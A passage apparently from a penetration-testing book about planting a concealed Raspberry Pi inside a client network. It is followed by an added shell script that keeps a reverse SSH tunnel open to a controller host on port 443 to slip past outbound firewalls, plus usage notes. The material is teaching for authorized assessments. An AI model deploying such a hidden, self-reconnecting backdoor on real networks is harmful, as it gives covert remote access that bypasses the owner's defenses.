The small form factor of the Raspberry Pi makes it an excellent platform for concealed or otherwise inconspicuous deployment inside the customer's environment. Many organizations block inbound connections at the perimeter precisely to prevent backdoors into their network. In a white-box assessment, we may be explicitly allowed to open a firewall rule permitting SSH to our Raspberry Pi, as shown in the following image. The bad news is that even where policy permits this, it can be hard to arrange in practice when the engagement spans multiple sites under separate administrative control. And breaking through the perimeter as step 1 of a penetration test makes a lot of noise, which leaves us either frustrated or looking for work. So how do we, out here in the wild, communicate with our Raspberry Pi 3 on the inside?
We can take advantage of the fact that most organizations do not restrict outbound traffic by default on their...
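The text breaks off before naming the mechanism, so the following is an added example, not code from the book: it assumes the usual answer to an outbound-only firewall, a reverse SSH tunnel that the Pi initiates to a host we control, so that our sshd on the Pi becomes reachable from the outside without any inbound rule. Every host name, account, port and key path here is an assumption for illustration; 443/tcp is chosen as the egress port only because it is the one most often allowed out.

```bash
#!/bin/sh
# Added example (not from the book): keep a reverse SSH tunnel from the
# Raspberry Pi to a host we control, so the Pi's sshd can be reached from
# outside without opening any inbound firewall rule. All names, ports and
# paths below are assumptions for illustration.

C2_HOST="${C2_HOST:-ops.example.net}"          # assumed: our Internet-facing box
C2_USER="${C2_USER:-tunnel}"                    # assumed: unprivileged account on it
C2_PORT="${C2_PORT:-443}"                       # assumed: egress to 443/tcp is allowed
REMOTE_BIND="${REMOTE_BIND:-2222}"              # port opened on C2_HOST's loopback
LOCAL_SSH="${LOCAL_SSH:-22}"                    # the Pi's own sshd
KEY="${KEY:-/root/.ssh/tunnel_ed25519}"         # assumed: dedicated key for this tunnel
KNOWN_HOSTS="${KNOWN_HOSTS:-/root/.ssh/known_hosts}"  # pre-seeded with C2_HOST's key

# Build the ssh command line as a string. Kept separate from run_tunnel so
# it can be inspected (or tested) without actually connecting anywhere.
#  -N -T                  no remote command, no pty: forwarding only
#  ExitOnForwardFailure   die (and get restarted) if the -R bind is refused
#  ServerAlive*           notice a silently dropped session within ~90 s
#  StrictHostKeyChecking  never accept an unknown C2 host key from a field box
#  -R 127.0.0.1:...       bind on C2's loopback only, never on 0.0.0.0
build_tunnel_cmd() {
    printf 'ssh -N -T -i %s -p %s -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -o ServerAliveCountMax=3 -o StrictHostKeyChecking=yes -o UserKnownHostsFile=%s -R 127.0.0.1:%s:127.0.0.1:%s %s@%s\n' \
        "$KEY" "$C2_PORT" "$KNOWN_HOSTS" "$REMOTE_BIND" "$LOCAL_SSH" "$C2_USER" "$C2_HOST"
}

# Reconnect forever with a short pause: egress filters, DHCP renewals and
# sleepy network gear will drop the session sooner or later. eval is safe
# here because the string is built only from our own variables above.
run_tunnel() {
    while :; do
        eval "$(build_tunnel_cmd)"
        sleep 15
    done
}

# Only start the loop when asked to, so the file can also be sourced.
if [ "${RUN_TUNNEL:-0}" = "1" ]; then
    run_tunnel
fi
```

Start it on the Pi with `RUN_TUNNEL=1 sh reverse_tunnel.sh` (or wrap the same command line in autossh or a systemd unit). On the C2 host, `ssh -p 2222 pi@127.0.0.1` then lands on the Pi. Two caveats a tester should act on: the private key and the C2 address live on a device that may be found and seized, so the `tunnel` account on the C2 host should carry a `restrict,port-forwarding` authorized_keys entry and no shell; and if sshd on the C2 host does not listen on 443, add a second `Port 443` line there rather than weakening egress assumptions on the Pi side.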